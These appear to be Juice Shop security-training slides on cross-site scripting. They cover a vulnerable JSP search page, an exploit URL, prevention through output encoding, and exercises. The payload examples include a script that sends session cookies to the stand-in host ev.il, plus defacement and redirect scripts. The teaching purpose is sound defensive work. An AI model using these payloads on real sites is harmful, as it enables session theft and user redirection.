## XSS

(Cross-Site Scripting)

## **Cross-Site Scripting**

- 1. An attacker can use XSS to send a malicious script to an unsuspecting user
- 2. The end user's browser has *no way to know that the script should not be trusted*, and will execute the script

#### **Root Cause**

Web applications vulnerable to XSS...

- 1. ...include untrusted data (usually from an HTTP request) into dynamic content...
- 2. ...that is then sent to a web user without previously validating for malicious content

## **Typical Impact**

- Steal user's session
- Steal sensitive data
- Rewrite the web page
- Redirect user to malicious website

## **Typical Phishing Email**

Dear valued customer!

You won our big lottery which you might not even have participated in! Click on the following totall inconspicious link to claim your prize **now**!

#### CLICK HER! FREE STUFF! YOU WON!

Sincereely yours,

Bjorn Kimminich CEO of Juice Shop Inc.

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## **Risk Rating**

### **Cross-Site Scripting (XSS)**

Exploitability	Prevalence	Detecability	Impact	Risk
Easy	Widespread	Easy	Moderate	A7

# X Vulnerable Code Example

```
<!--search.jsp-->
<%String searchCriteria = request.getParameter("searchValue");%>
```

might forward to the following page when executing the search:

```
<!--results.jsp-->
Search results for <b><%=searchCriteria%></b>:

<!-- Render the actual results table here -->
```

## Benign Usage

https://my-little-application.com/search.jsp?searchValue=blablubb

results in the following HTML on the results.jsp page:

Search results for <b>blablubb</b>:

rendering as:

Search results for **blablubb**:

## **Exploit Example**

```
https://my-little-application.com/search.jsp?searchValue=</b><img
src="https://placekitten.com/g/100/100"/><b>
```

results in the following HTML on the results.jsp page:

```
Search results for <b></b><img src="https://placekitten.com/g/100/100"/><b></b>:
```

rendering as:



Search results for

## **XSS Attack Payload Examples**

#### **Stealing User Session**

```
<script>
  new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie);
</script>
```

#### Site Defacement

```
<script>document.body.background="http://ev.il/image.jpg";</script>
```

#### Redirect

```
<script>window.location.assign("http://ev.il");</script>
```

### Forms of XSS

- Reflected XSS: Application includes unvalidated and unescaped user input as part of HTML output
- **Stored XSS**: Application stores unsanitized user input that is viewed at a later time by another user
- **DOM XSS**: JavaScript frameworks & single-page applications dynamically include attacker-controllable data to a page
- i The previous example vulnerability and exploit of results.jsp is a typical Reflected XSS.

### Prevention

- Do not include user supplied input in your output!
- Output Encode all user supplied input
  - e.g. OWASP Java Encoder
- Perform White List Input Validation on user input
- Use an HTML Sanitizer for larger user supplied HTML chunks
  - e.g. OWASP Java HTML Sanitizer

# ✓ Fixed Code Example

Using Encoder from OWASP Java Encoder Project:

```
<%import org.owasp.encoder.Encoder;%>
Search results for <b><%=Encoder.forHtml(searchCriteria)%></b>:
<!-- ... -->
```

Same result using HtmlUtils from the popular Spring framework:

```
<%import org.springframework.web.util.HtmlUtils;%>
Search results for <b><%=HtmlUtils.htmlEscape(searchCriteria)%></b>:
<!-- ... -->
```

### **OWASP Java HTML Sanitizer**

Fast and easy to configure HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS.

### Using a simple pre-packaged policy

### Exercise

- 1. (\*\*) Perform a *DOM XSS* attack (\*\*)
- 2. (\*\*) Use the *Bonus Payload* to enjoy some nice music (\*\*)
- 3. Perform a *Reflected XSS* attack (★)
- 4. Beat a weak Client-side XSS Protection during user registration ( $\star$
- 5. Give the shop feedback bypassing its Server-side XSS Protection ( $\star$   $\star$   $\star$   $\star$ )